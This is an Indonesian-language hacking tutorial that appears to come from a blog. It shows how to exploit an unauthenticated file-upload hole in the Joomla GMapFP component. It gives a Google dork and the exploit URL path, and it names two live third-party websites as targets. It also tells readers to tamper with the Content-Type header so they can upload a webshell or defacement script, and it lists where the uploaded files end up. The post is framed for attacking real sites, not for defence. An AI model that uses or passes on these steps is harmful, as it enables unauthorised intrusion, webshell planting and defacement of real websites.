Joomla Component GMapFP J3.5/J3.5F - Unauthenticated AFU

 Hai Sobat 

-

-

Kembali Lagi Saya Saya Admin Gans Wibu Kerajaan

--

Kali Ini Saya Bakal Share Pengetahuan Yg Tidak Begitu Penting Sih :v 

Ya udahlah Langsung Aja Kuy?

Oke...

--

--

WASAPP .. Tadi Gw Coba Search" Di Google Dan Tanya" Keteman Saya..

DAN Saya Mendapatkan Exploit Buat Joomla 

Oke Lah Langsung Ke Pembahasan Kuy?

--

Bahan : 

Webshell : download sendiri

Google Dork : inurl:/index.php?option=com_gmapfp

 Exploit : /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload

1. Dorking

Dorking dengan dork diatas dan choose 1 target untuk dieksekusi. Disini saya memakai live target yah,

Live target : 

https://bella-vista.com.gr/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload

http://tuningrussia.org/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload

2. Eksekusi

Lanjut jika sudah menentukan target,kita masukan exploitnya kedalam url. Dan jika ada form upload, maka bisa dikatakan vuln.

Upload file yang kalian inginkan kedalam server, namun disana terdapat sebuah filter yang hanya mengaccept file dengan Content-Type : image/jpeg atau yang lainnya. Jadi saya sarankan kalian coba melakukan tamper data untuk mengupload Webshell atau script deface kalian :D.

Dan untuk file aksesnya adalah : 

http://target.com/images/stories/gmapfp/test.html.gif

http://target.com/images/gmapfp/test2.html.gif 

http://target.com/images/gmapfp/test2.html.gif

 

 Referensi : https://cxsecurity.com/issue/WLB-2020090037

 

Sekian dari saya, bila ada yang kurang atau salah kata, bodo amat xixixi

Assalamualaikum wr wb..